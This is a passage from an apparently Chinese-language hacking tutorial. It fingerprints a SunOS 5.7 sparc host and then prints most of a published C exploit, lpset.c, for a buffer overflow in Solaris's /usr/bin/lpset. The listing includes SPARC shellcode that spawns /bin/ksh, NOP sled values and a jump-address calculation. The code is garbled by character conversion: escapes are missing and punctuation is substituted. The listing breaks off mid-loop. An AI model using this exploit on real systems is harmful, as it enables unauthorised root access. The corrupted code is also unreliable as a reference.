按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
SunOS mars 5。7:SunOS的版本。
sparc:服务器版本。
Generic_106541…08:补丁情况。
找到exploit:lpset。c
cat 》lpst。c
/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland *://lsd…pl/ #*/
/*## /usr/bin/lpset #*/
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
char shellcode''=
〃x20xbfxffxff〃 /* bn;a */
〃x20xbfxffxff〃 /* bn;a */
〃x7fxffxffxff〃 /* call */
〃x90x03xe0x20〃 /* add %o7;32;%o0 */
〃x92x02x20x10〃 /* add %o0;16;%o1 */
〃xc0x22x20x08〃 /* st%g0;'%o0+8' */
〃xd0x22x20x10〃 /* st%o0;'%o0+16'*/
〃xc0x22x20x14〃 /* st%g0;'%o0+20'*/
〃x82x10x20x0b〃 /* mov 0xb;%g1 */
〃x91xd0x20x08〃 /* ta8 */
〃/bin/ksh〃
;
char jump''=
〃x81xc3xe0x08〃 /* jmp %o7+8 */
〃x90x10x00x0e〃 /* mov %sp;%o0 */
;
static char nop''=〃x80x1cx40x11〃;
main(int argc;char **argv){
char buffer'10000';adr'4';*b;
int i;
printf(〃copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd…pl/n〃);
printf(〃/usr/bin/lpset for solaris 2。6 2。7 sparcnn〃);
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;
b=buffer;
sprintf(b;〃***=〃);
b+=4;
for(i=0;i